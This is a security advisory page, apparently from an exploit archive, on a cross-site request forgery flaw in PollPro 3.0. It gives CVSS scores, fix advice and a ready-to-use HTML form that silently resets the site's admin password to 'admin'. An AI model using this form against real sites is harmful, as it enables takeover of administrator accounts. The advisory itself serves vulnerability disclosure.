PollPro 3.0 XSRF VuLn.

2009-01-05 / 2009-01-06
Credit: The_0nur-n0x
Risk: Medium
Local: No
Remote: No
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

< ------------------- header data start ------------------- > ############################################################# # Application Name : PollPro # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form&#8217;a Oturum Key&#8217;i (Session Token) eklenmeli, eski &#351;ifre sorulmal&#305;d&#305;r. # author : The_0nur-n0x ############################################################# < ------------------- header data end of ------------------- > <tr> <th0x> <td> <br /> <form action="http://Site.net/PATH/admin/agent_edit.asp?ID=USERID" name="frm" method="post" onSubmit="return Th30nur()"> <table cellpadding="2" cellspacing="0" border="0" align="center"><tr> <td>Username:</td> <td><input style="width: 400px;" type="Text" disabled="disabled" name="username" value="admin" size="45" maxlength="25" class="textbox" /></td> </tr><tr> <td>Password:</td> <td><input style="width: 400px;" type="Password" name="password" size="45" value="admin" maxlength="25" class="textbox" /></td> </tr><tr> <td>Name:</td> <td><input style="width: 400px;" type="Text" name="name" size="45" value="Admin User" maxlength="80" class="textbox" /></td> </tr><tr> <td>Enabled:</td> <td><input type="Checkbox" name="enable" checked value="1" /></td> </tr><tr> <td colspan="2" align="right"><br /><input type="Submit" value="Update" /></td> </tr></table> <input type="Hidden" name="mode" value="edit" /> </form> <br /> </td> </tr></table></th0x>

References:

http://xforce.iss.net/xforce/xfdb/47754
http://secunia.com/advisories/33319
http://marc.info/?l=bugtraq&amp;m=123117044713213&amp;w=2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top